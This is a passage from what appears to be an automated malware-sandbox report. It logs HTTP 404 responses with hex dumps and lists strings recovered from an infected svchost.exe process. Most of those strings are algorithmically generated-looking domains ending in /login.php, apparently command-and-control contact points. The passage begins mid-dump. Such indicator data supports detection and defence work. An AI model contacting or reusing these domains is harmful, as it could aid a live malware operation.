65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:25:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:25:30 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Mon, 11 Nov 2024 17:25:25 GMTContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:25:30 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: svchost.exe, 00000002.00000003.1362482553.0000000008A0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1619980439.0000000008A15000.00000004.00000020.00020000.00000000.sdmp, login[1].htm0.2.drString found in binary or memory: http://InquiryGrid.com/sk-domsale.php?dom=galyqaz.com&eds=YnJva2VyYWdlQHNrZW56by5jb20%3D&_isk_=7444&
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacydes.com/login.php
Source: svchost.exe, 00000002.00000003.1933269002.0000000002F32000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1931887826.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyhuw.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacykub.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889766651.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacynow.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacypiw.com/login.php
Source: svchost.exe, 00000002.00000003.1744736158.0000000008AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752892568.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1752825184.0000000002F06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyqob.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899438439.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1863832827.0000000002FEA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845150942.0000000002FE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1838601073.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1845472203.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889837686.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1868778341.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899594929.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gacyvah.com/login.php
Source: svchost.exe, 00000002.00000003.1816439282.00000000008FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyciz.com/
Source: svchost.exe, 00000002.00000003.1838938821.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1832918592.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816431355.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1822071432.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1835708168.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1833597017.0000000002F7E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1816435063.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1817764559.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyciz.com/login.php
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyduz.com/login.php
Source: svchost.exe, 00000002.00000003.1874151632.0000000008A7F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870864138.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874490418.0000000002F33000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1870410496.0000000008AE8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1874254950.0000000002F28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1871321713.0000000002FE9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyfob.com/login.php
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/http://gahyziw.com/H
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/http://vocydyc.com/X
Source: svchost.exe, 00000002.00000003.1902054609.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902462247.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902573790.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902583004.0000000002F60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1916356389.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1906808351.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadykyz.com/login.php
Source: svchost.exe, 00000002.00000003.1947093650.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1920326328.0000000008B58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929708122.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1932220446.0000000008B57000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadynub.com/login.php
Source: svchost.exe, 00000002.00000003.1899210926.0000000008B57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1915969207.0000000002F25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadypah.com/login.php
Source: svchost.exe, 00000002.00000003.1915963759.0000000002FF6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyqaw.com/
Source: svchost.exe, 00000002.00000003.1878436554.0000000002FF6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878521987.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878975656.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gadyvis.com/login.php
